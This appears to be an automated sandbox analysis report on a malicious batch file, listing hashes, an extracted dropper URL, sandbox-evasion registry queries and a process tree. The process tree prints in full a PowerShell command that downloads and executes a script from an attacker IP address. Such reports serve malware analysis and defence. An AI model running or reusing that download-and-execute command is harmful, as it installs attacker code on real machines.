Analysis
  max time kernel:  147s
  max time network: 151s
  platform:         windows10_x64
  resource:         win10v191014
  submitted:        10-02-2020 17:10
Static task
  static1

Behavioral task
  behavioral1
  Sample:   j6tiKu2h.bat
  Resource: win7v191014 (windows7_x64)
  0 signatures, 0 seconds

Behavioral task
  behavioral2
  Sample:   j6tiKu2h.bat
  Resource: win10v191014 (windows10_x64)
  0 signatures, 0 seconds
General
  Target: j6tiKu2h.bat
  Size:   197B
  MD5:    050369defab123655788bb4b8aab241f
  SHA1:   807cb1878569950049819f6a8122a760bf41624c
  SHA256: 5ce9cc906365d7b8b504d946dd31f3a37c290972ad6966972689524abaa6d12a
  SHA512: 55df33527936776d38b1a893f6e6f621eca96dad1b2d90903213697b7a0d50e274212818b20c06e00fb8d597a11231d6181d53d605e9d0c5b1983d034bf73026
  Score:  10/10
Malware Config
  Extracted
    Language:    ps1
    Source:      URLs
    ps1.dropper: http://185.103.242.78/pastes/j6tiKu2h
Signatures

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
  description                pid   process
  Token: SeRestorePrivilege  5000  WerFault.exe
  Token: SeBackupPrivilege   5000  WerFault.exe
  Token: SeDebugPrivilege    5000  WerFault.exe

Suspicious behavior: EnumeratesProcesses (17 IoCs)
  Processes:
  pid   process
  5000  WerFault.exe  (listed 17 times)

Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
  description        ioc                                                                                  process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0                      WerFault.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz                 WerFault.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  WerFault.exe

Enumerates system info in registry (2 TTPs, 2 IoCs)
  Processes:
  description        ioc                                                           process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS            WerFault.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU  WerFault.exe

Program crash (1 IoCs)
  Processes:
  pid   process
  5000  WerFault.exe
Processes

C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\j6tiKu2h.bat"
  PID: 4888

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/j6tiKu2h');Invoke-BOKLQKMLWDENMA;Start-Sleep -s 10000"
      PID: 4932

        C:\Windows\SysWOW64\WerFault.exe
          Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4932 -s 704
          PID: 5000
          Signatures:
            Suspicious use of AdjustPrivilegeToken
            Suspicious behavior: EnumeratesProcesses
            Checks processor information in registry
            Enumerates system info in registry
            Program crash

\??\c:\windows\system32\taskhostw.exe
  Command line: taskhostw.exe -RegisterDevice -SettingChange -Full
  PID: 4612